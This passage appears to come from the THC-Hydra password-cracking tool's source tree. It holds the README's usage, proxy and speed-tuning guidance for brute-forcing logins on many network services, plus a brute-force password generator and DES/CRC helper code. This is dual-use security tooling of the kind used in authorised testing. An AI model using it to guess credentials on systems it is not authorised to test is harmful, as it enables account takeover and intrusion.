Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET,
HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP,
MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere,
PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
However the module engine for new services is very easy so it won't take a
long time until even more services are supported.
Your help in writing, enhancing or fixing modules is highly appreciated!! :-)
HOW TO COMPILE
--------------
For hydra, just type:
./configure
make
make install
If you need ssh module support, you have to setup libssh on your system,
get it from http://www.libssh.org, for ssh v1 support you also need to add
"-DWITH_SSH1=On" option in the cmake command line.
If you use Ubuntu, this will install supplementary libraries needed for a
few optional modules:
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
firebird2.1-dev libncp-dev
This enables all optional modules and features with the exception of Oracle,
SAP R/3 and the apple filing protocol - which you will need to download and
install from the vendor's web sites.
For all other Linux derivates and BSD based systems, use the system
software installer and look for similar named libraries like in the
comand above. In all other cases you have to download all source libraries
and compile them manually.
SUPPORTED PLATFORMS
-------------------
All UNIX platforms (linux, *bsd, solaris, etc.)
Mac OS/X
Windows with Cygwin (both ipv4 and ipv6)
Mobile systems based on Linux or Mac OS/X (e.g. Android, iPhone, Zaurus, iPaq)
HOW TO USE
----------
Type "./configure", followed by "make" to compile hydra and then
"./hydra -h" to see the command line options.
You make also type "make install" to install hydra to /usr/local/bin.
Note that NO login/password file is included. Generate them yourself.
For Linux users, a GTK gui is available, try "./xhydra"
SPECIAL OPTIONS FOR MODULES
---------------------------
Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m
commandline option, you can pass one option to a module.
Many modules use this, a few require it!
To see the special option of a module, type:
hydra -U <module>
e.g.
./hydra -U http-post-form
The special options can be passed via the -m parameter, as 3rd command line
option or in the service://target/option format.
Examples (they are all equal):
./hydra -l test -p test -m PLAIN 127.0.0.1 imap
./hydra -l test -p test 127.0.0.1 imap PLAIN
./hydra -l test -p test imap://127.0.0.1/PLAIN
RESTORING AN ABORTED/CRASHED SESSION
------------------------------------
When hydra is aborted with Control-C, killed or crashs, it leavs a
"hydra.restore" file behind which contains all necessary information to
restore the session. This session file is written every 5 minutes.
NOTE: if you are cracking parallel hosts (-M option), this feature doesnt
work, and is therefore disabled!
NOTE: the hydra.restore file can NOT be copied to a different platform (e.g.
from little indian to big indian, or from solaris to aix)
HOW TO SCAN/CRACK OVER A PROXY
------------------------------
The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works
just for the http/www service!).
The following syntax is valid:
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
For all other services, use the HYDRA_PROXY variable to scan/crack
via by default a web proxy's CONNECT call. It uses the same syntax. eg:
HYDRA_PROXY=[http|socks4|socks5]://proxy_addr:proxy_port
for example:
HYDRA_PROXY=http://proxy.anonymizer.com:8000
If you require authentication for the proxy, use the HYDRA_PROXY_AUTH
environment variable:
HYDRA_PROXY_AUTH="the_login:the_password"
ADDITIONAL HINTS
----------------
* sort your password files by likelihood and use the -u option to find
passwords much faster!
* uniq your dictionary files! this can save you a lot of time :-)
cat words.txt | sort | uniq > dictionary.txt
* if you know that the target is using a password policy (allowing users
only to choose password with a minimum length of 6, containing a least one
letter and one number, etc. use the tool pw-inspector which comes along
with the hydra package to reduce the password list:
cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt
SPEED
-----
through the parallizing feature, this password cracker tool can be very
fast, however it depends on the protocol. The fastest are generally POP3
and FTP.
Experiment with the task option (-t) to speed things up! The higher - the
faster ;-) (but too high - and it disables the service)
STATISTICS
----------
Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing
295 entries (294 tries invalid logins, 1 valid). Every test was run three
times (only for "1 task" just once), and the average noted down.
P A R A L L E L T A S K S
SERVICE 1 4 8 16 32 50 64 100 128
------- --------------------------------------------------------------------
telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55*
ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32
pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50
imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21
(*)
Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with
128 tasks, running four times resulted in timings between 28 and 97 seconds!
The reason for this is unknown...
guesses per task (rounded up):
295 74 38 19 10 6 5 3 3
guesses possible per connect (depends on the server software and config):
telnet 4
ftp 6
pop3 1
imap 3
BUGS & FEATURES
---------------
Hydra:
Email me or David if you find bugs or if you have written a new module.
vh@thc.org (and put "antispam" in the subject line)
David (dot) Maciejak @ gmail (dot) com
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----

204
bfg.c Normal file
View file

@ -0,0 +1,204 @@
/* code original by Jan Dlabal <dlabaljan@gmail.com>, partially rewritten by vh */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <ctype.h>
#include "bfg.h"
bf_option bf_options;
#ifdef HAVE_MATH_H
extern int debug;
// return values : 0 on success, 1 on error
//
// note that we check for -x .:.:ab but not for -x .:.:ba
//
int bf_init(char *arg) {
int i = 0;
int crs_len = 0;
char flags = 0;
char *tmp = strchr(arg, ':');
if (!tmp) {
fprintf(stderr, "Error: Invalid option format for -x\n");
return 1;
} else {
tmp[0] = '\0';
}
bf_options.from = atoi(arg);
if (bf_options.from < 1 || bf_options.from > 127) {
fprintf(stderr, "Error: minimum length must be between 1 and 127, format: -x min:max:types\n");
return 1;
}
arg = tmp + 1;
tmp++;
if (!arg[0]) {
fprintf(stderr, "Error: no maximum length specified for -x min:max:types!\n");
return 1;
}
tmp = strchr(arg, ':');
if (!tmp) {
fprintf(stderr, "Error: Invalid option format for -x\n");
return 1;
} else {
tmp[0] = '\0';
}
bf_options.to = atoi(arg);
tmp++;
if (bf_options.from > bf_options.to) {
fprintf(stderr, "Error: you specified a minimum length higher than the maximum length!\n");
return 1;
}
if (tmp[0] == 0) {
fprintf(stderr, "Error: charset not specified!\n");
return 1;
}
bf_options.crs = malloc(sizeof(char) * BF_CHARSMAX);
if (bf_options.crs == NULL) {
fprintf(stderr, "Error: can't allocate enough memory!\n");
return 1;
}
bf_options.crs[0] = 0;
for (; tmp[i]; i++) {
switch (tmp[i]) {
case 'a':
crs_len += 26;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_LOWER) {
free(bf_options.crs);
fprintf(stderr, "Error: 'a' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "abcdefghijklmnopqrstuvwxyz");
flags |= BF_LOWER;
}
break;
case 'A':
crs_len += 26;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_UPPER) {
free(bf_options.crs);
fprintf(stderr, "Error: 'A' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "ABCDEFGHIJKLMNOPQRSTUVWXYZ");
flags |= BF_UPPER;
}
break;
case '1':
crs_len += 10;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else if (flags & BF_NUMS) {
free(bf_options.crs);
fprintf(stderr, "Error: '1' specified more than once in charset!\n");
return 1;
} else {
strcat(bf_options.crs, "0123456789");
flags |= BF_NUMS;
}
break;
default:
if ((tmp[i] >= '2' && tmp[i] <= '9') || tmp[i] == '0') {
if ((flags & BF_NUMS) > 0) {
printf("[ERROR] character %c defined in -x although the whole number range was already defined by '1', ignored\n", tmp[i]);
continue;
}
printf("[WARNING] adding character %c for -x, note that '1' will add all numbers from 0-9\n", tmp[i]);
}
if (tolower((int) tmp[i]) >= 'b' && tolower((int) tmp[i]) <= 'z') {
if ((tmp[i] <= 'Z' && (flags & BF_UPPER) > 0) || (tmp[i] > 'Z' && (flags & BF_UPPER) > 0)) {
printf("[ERROR] character %c defined in -x although the whole letter range was already defined by '%c', ignored\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a');
continue;
}
printf("[WARNING] adding character %c for -x, note that '%c' will add all %scase letters\n", tmp[i], tmp[i] <= 'Z' ? 'A' : 'a', tmp[i] <= 'Z' ? "up" : "low");
}
crs_len++;
if (BF_CHARSMAX - crs_len < 1) {
free(bf_options.crs);
fprintf(stderr, "Error: charset specification exceeds %d characters.\n", BF_CHARSMAX);
return 1;
} else {
bf_options.crs[crs_len - 1] = tmp[i];
bf_options.crs[crs_len] = '\0';
}
break;
}
}
bf_options.crs_len = crs_len;
bf_options.current = bf_options.from;
memset((char *) bf_options.state, 0, sizeof(bf_options.state));
if (debug)
printf("[DEBUG] bfg INIT: from %d, to %d, len: %d, set: %s\n", bf_options.from, bf_options.to, bf_options.crs_len, bf_options.crs);
return 0;
}
unsigned long int bf_get_pcount() {
int i;
unsigned long int count = 0;
for (i = bf_options.from; i <= bf_options.to; i++)
count += (unsigned long int) (pow((float) bf_options.crs_len, (float) i));
return count;
}
char *bf_next() {
int i, pos = bf_options.current - 1;
if (bf_options.current > bf_options.to)
return NULL; // we are done
if ((bf_options.ptr = malloc(BF_CHARSMAX)) == NULL) {
fprintf(stderr, "Error: Can not allocate memory for -x data!\n");
return NULL;
}
for (i = 0; i < bf_options.current; i++)
bf_options.ptr[i] = bf_options.crs[bf_options.state[i]];
bf_options.ptr[bf_options.current] = 0;
if (debug) {
printf("[DEBUG] bfg IN: len %d, from %d, current %d, to %d, state:", bf_options.crs_len, bf_options.from, bf_options.current, bf_options.to);
for (i = 0; i < bf_options.current; i++)
printf(" %d", bf_options.state[i]);
printf(", x: %s\n", bf_options.ptr);
}
while (pos >= 0 && (++bf_options.state[pos]) >= bf_options.crs_len) {
bf_options.state[pos] = 0;
pos--;
}
if (pos < 0) {
bf_options.current++;
memset((char *) bf_options.state, 0, sizeof(bf_options.state));
}
return bf_options.ptr;
}
#endif

53
bfg.h Normal file
View file

@ -0,0 +1,53 @@
/* (c) 2008 Jan Dlabal <dlabaljan@gmail.com> */
/* */
/* This file is part of the bfg. */
/* */
/* bfgen is free software: you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation, either version 3 of the License, or */
/* any later version. */
/* */
/* bfgen is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with bfgen. If not, see <http://www.gnu.org/licenses/>. */
#ifndef BF_H
#define BF_H
#define BF_NAME "bfg"
#define BF_VERSION "v0.3"
#define BF_YEAR "2009"
#define BF_WEBSITE "http://houbysoft.com/bfg/"
#define BF_BUFLEN 1024
#define BF_CHARSMAX 256 /* how many max possibilities there are for characters, normally it's 2^8 = 256 */
#define BF_LOWER 1
#define BF_UPPER 2
#define BF_NUMS 4
typedef struct {
unsigned char from;
unsigned char to;
unsigned char current;
unsigned char state[BF_CHARSMAX]; /* which position has which character */
unsigned char pos; /* where in current string length is the position */
unsigned char crs_len; /* length of selected charset */
char *arg; /* argument received for bfg commandline option */
char *crs; /* internal representation of charset */
char *ptr; /* ptr to the last generated password */
} bf_option;
extern bf_option bf_options;
#ifdef HAVE_MATH_H
extern unsigned long int bf_get_pcount();
extern int bf_init(char *arg);
extern char *bf_next();
#endif
#endif

1064
configure vendored Executable file
View file

File diff suppressed because it is too large Load diff

103
crc32.c Normal file
View file

@ -0,0 +1,103 @@
/*-
* COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or
* code or tables extracted from it, as desired without restriction.
*
* First, the polynomial itself and its table of feedback terms. The
* polynomial is
* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0
*
* Note that we take it "backwards" and put the highest-order term in
* the lowest-order bit. The X^32 term is "implied"; the LSB is the
* X^31 term, etc. The X^0 term (usually shown as "+1") results in
* the MSB being 1
*
* Note that the usual hardware shift register implementation, which
* is what we're using (we're merely optimizing it by doing eight-bit
* chunks at a time) shifts bits into the lowest-order term. In our
* implementation, that means shifting towards the right. Why do we
* do it this way? Because the calculated CRC must be transmitted in
* order from highest-order term to lowest-order term. UARTs transmit
* characters in order from LSB to MSB. By storing the CRC this way
* we hand it to the UART in the order low-byte to high-byte; the UART
* sends each low-bit to hight-bit; and the result is transmission bit
* by bit from highest- to lowest-order term without requiring any bit
* shuffling on our part. Reception works similarly
*
* The feedback terms table consists of 256, 32-bit entries. Notes
*
* The table can be generated at runtime if desired; code to do so
* is shown later. It might not be obvious, but the feedback
* terms simply represent the results of eight shift/xor opera
* tions for all combinations of data and CRC register values
*
* The values must be right-shifted by eight bits by the "updcrc
* logic; the shift must be unsigned (bring in zeroes). On some
* hardware you could probably optimize the shift in assembler by
* using byte-swap instructions
* polynomial $edb88320
*
*
* CRC32 code derived from work by Gary S. Brown.
*/
#include <sys/types.h>
unsigned int crc32_tab[] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d
};
unsigned int crc32(const void *buf, unsigned int size) {
const unsigned char *p;
unsigned int crc;
p = buf;
crc = ~0U;
while (size--)
crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);
return crc ^ ~0U;
}

8
crc32.h Normal file
View file

@ -0,0 +1,8 @@
#ifndef CRC32_H
#define CRC32_H
#include <sys/types.h>
unsigned int crc32(const void *buf, unsigned int size);
#endif

469
d3des.c Normal file
View file

@ -0,0 +1,469 @@
/* 2001 van Hauser for Hydra: commented out KnR Kn3 and Df_Key to remove
compiler warnings for unused definitions.
*/
/*
* This is D3DES (V5.09) by Richard Outerbridge with the double and
* triple-length support removed for use in VNC. Also the bytebit[] array
* has been reversed so that the most significant bit in each byte of the
* key is ignored, not the least significant.
*
* These changes are:
* Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/
/* D3DES (V5.09) -
*
* A portable, public domain, version of the Data Encryption Standard.
*
* Written with Symantec's THINK (Lightspeed) C by Richard Outerbridge.
* Thanks to: Dan Hoey for his excellent Initial and Inverse permutation
* code; Jim Gillogly & Phil Karn for the DES key schedule code; Dennis
* Ferguson, Eric Young and Dana How for comparing notes; and Ray Lau,
* for humouring me on.
*
* Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge.
* (GEnie : OUTER; CIS : [71755,204]) Graven Imagery, 1992.
*/
#include "d3des.h"
static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);
static unsigned long KnL[32] = { 0L };
/* not needed ...
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };
*/
static unsigned short bytebit[8] = {
01, 02, 04, 010, 020, 040, 0100, 0200
};
static unsigned long bigbyte[24] = {
0x800000L, 0x400000L, 0x200000L, 0x100000L,
0x80000L, 0x40000L, 0x20000L, 0x10000L,
0x8000L, 0x4000L, 0x2000L, 0x1000L,
0x800L, 0x400L, 0x200L, 0x100L,
0x80L, 0x40L, 0x20L, 0x10L,
0x8L, 0x4L, 0x2L, 0x1L
};
/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17,
9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35,
62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21,
13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3
};
static unsigned char totrot[16] = {
1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28
};
static unsigned char pc2[48] = {
13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9,
22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31
};
void deskey(key, edf) /* Thanks to James Gillogly & Phil Karn! */
unsigned char *key;
int edf;
{
register int i, j, l, m, n;
unsigned char pc1m[56], pcr[56];
unsigned long kn[32];
for (j = 0; j < 56; j++) {
l = pc1[j];
m = l & 07;
pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
}
for (i = 0; i < 16; i++) {
if (edf == DE1)
m = (15 - i) << 1;
else
m = i << 1;
n = m + 1;
kn[m] = kn[n] = 0L;
for (j = 0; j < 28; j++) {
l = j + totrot[i];
if (l < 28)
pcr[j] = pc1m[l];
else
pcr[j] = pc1m[l - 28];
}
for (j = 28; j < 56; j++) {
l = j + totrot[i];
if (l < 56)
pcr[j] = pc1m[l];
else
pcr[j] = pc1m[l - 28];
}
for (j = 0; j < 24; j++) {
if (pcr[pc2[j]])
kn[m] |= bigbyte[j];
if (pcr[pc2[j + 24]])
kn[n] |= bigbyte[j];
}
}
cookey(kn);
return;
}
static void cookey(raw1)
register unsigned long *raw1;
{
register unsigned long *cook, *raw0;
unsigned long dough[32];
register int i;
cook = dough;
for (i = 0; i < 16; i++, raw1++) {
raw0 = raw1++;
*cook = (*raw0 & 0x00fc0000L) << 6;
*cook |= (*raw0 & 0x00000fc0L) << 10;
*cook |= (*raw1 & 0x00fc0000L) >> 10;
*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
*cook = (*raw0 & 0x0003f000L) << 12;
*cook |= (*raw0 & 0x0000003fL) << 16;
*cook |= (*raw1 & 0x0003f000L) >> 4;
*cook++ |= (*raw1 & 0x0000003fL);
}
usekey(dough);
return;
}
void cpkey(into)
register unsigned long *into;
{
register unsigned long *from, *endp;
from = KnL, endp = &KnL[32];
while (from < endp)
*into++ = *from++;
return;
}
void usekey(from)
register unsigned long *from;
{
register unsigned long *to, *endp;
to = KnL, endp = &KnL[32];
while (to < endp)
*to++ = *from++;
return;
}
void des(unsigned char *inblock, unsigned char *outblock) {
unsigned long work[2];
scrunch(inblock, work);
desfunc(work, KnL);
unscrun(work, outblock);
return;
}
static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into++ |= (*outof++ & 0xffL);
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into |= (*outof & 0xffL);
return;
}
static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> 8) & 0xffL;
*into++ = *outof++ & 0xffL;
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> 8) & 0xffL;
*into = *outof & 0xffL;
return;
}
static unsigned long SP1[64] = {
0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L
};
static unsigned long SP2[64] = {
0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L
};
static unsigned long SP3[64] = {
0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
